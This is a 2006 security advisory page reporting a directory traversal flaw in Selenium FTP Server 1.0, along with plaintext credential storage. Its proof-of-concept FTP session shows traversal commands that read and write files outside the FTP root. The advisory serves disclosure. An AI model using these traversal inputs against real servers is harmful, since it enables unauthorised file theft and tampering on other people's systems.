Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Selenium FTP Server Directory Traversal 16 Nov. 2006    Summary Selenium FTP Server is vulnerable to a directory transversal input validation error in which a remote unauthenticated user can issue using the DIR, LIST, NLST, etc commands to display any file on the remote server or use the GET/RECV command to retrieve any file outside the FTP root and the PUT/SEND to write to any location on the remote server.   Credit: The information has been provided by Greg Linares. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Selenium FTP Server version 1.0 Proof of concept: C:\LinaresExploits\>ftp localhost Connected to GregL-WS. 220 Selenium Server FTP (http://bibasoftware.com) User (GregL-WS:(none)): 331 Password required for . Password: 230 User logged in. ftp> dir \windows 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Nov 14 15:53 WINDOWS 226 File sent ok ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec. ftp> dir \windows\*.exe 200 Port command successful. 150 Opening data connection for directory list. -rwxrwxrwx 1 ftp ftp 68096 May 02 2005 agrsmdel.exe -rwxrwxrwx 1 ftp ftp 44544 Jun 02 1998 clspack.exe -rwxrwxrwx 1 ftp ftp 1032192 Aug 04 2004 explorer.exe -rwxrwxrwx 1 ftp ftp 10752 May 26 2005 hh.exe -rwxrwxrwx 1 ftp ftp 306688 Oct 29 1998 IsUninst.exe -rwxrwxrwx 1 ftp ftp 112640 Jul 01 2001 lsb_un20.exe -rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad.exe -rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad1.exe -rwxrwxrwx 1 ftp ftp 146432 Aug 04 2004 regedit.exe -rwxrwxrwx 1 ftp ftp 46352 Feb 28 2003 setdebug.exe -rwxrwxrwx 1 ftp ftp 286720 Sep 07 14:10 Setup1.exe -rwxrwxrwx 1 ftp ftp 32866 Aug 04 2004 slrundll.exe -rwxrwxrwx 1 ftp ftp 46592 Aug 02 2002 SOUNDMAN.EXE -rwxrwxrwx 1 ftp ftp 73216 Sep 07 14:10 ST6UNST.EXE -rwxrwxrwx 1 ftp ftp 15360 Aug 04 2004 taskman.exe -rwxrwxrwx 1 ftp ftp 90624 Oct 27 13:22 tsuninst1.exe -rwxrwxrwx 1 ftp ftp 49680 Aug 04 2004 twunk_16.exe -rwxrwxrwx 1 ftp ftp 25600 Aug 04 2004 twunk_32.exe -rwxrwxrwx 1 ftp ftp 299520 Mar 23 1999 uninst.exe -rwxrwxrwx 1 ftp ftp 107134 Apr 04 08:06 UninstallFirefox.exe -rwxrwxrwx 1 ftp ftp 86016 Dec 17 1999 unvise32.exe -rwxrwxrwx 1 ftp ftp 256192 Aug 04 2004 winhelp.exe -rwxrwxrwx 1 ftp ftp 283648 Aug 04 2004 winhlp32.exe 226 File sent ok ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec. ftp> get ..\windows\win.ini C:\mine.txt 200 Port command successful. 150 Opening data connection for ..\windows\win.ini. 226 File sent ok ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec. ftp> put C:\mine.txt ..\windows\toobad.txt 200 Port command successful. 150 Opening data connection for ..\windows\toobad.txt. 226 File received ok ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec. Furthermore the software improperly writes any username/password that might be used to login to the program in plaintext to the file[s] stored in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium Server\Servers  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Novell Zenworks Software Packaging LaunchHelp.dll Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Microsoft Internet Explorer swapNode Handling Code Execution Vulnerability Microsoft Internet Explorer Select Element Insufficient Type Checking Code Execution Vulnerability Internet Explorer Select Element Cache Code Execution Vulnerability Microsoft Office Graph DataFormat Signed Index Code Execution Vulnerability Microsoft Office Excel Conditional Expression Ptg Type Confusion Vulnerability Microsoft Internet Explorer Protected Mode Bypass Vulnerability Microsoft Internet Explorer 9 STYLE Object Parsing Code Execution Vulnerability Microsoft Internet Explorer XSLT SetViewSlave Code Execution Vulnerability CA Total Defense Suite Gateway Security Malformed HTTP Packet Code Execution Vulnerability HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Code Execution Vulnerability TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability Symantec Veritas Storage Foundation vxsvc.exe Unicode Code Execution Vulnerability HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®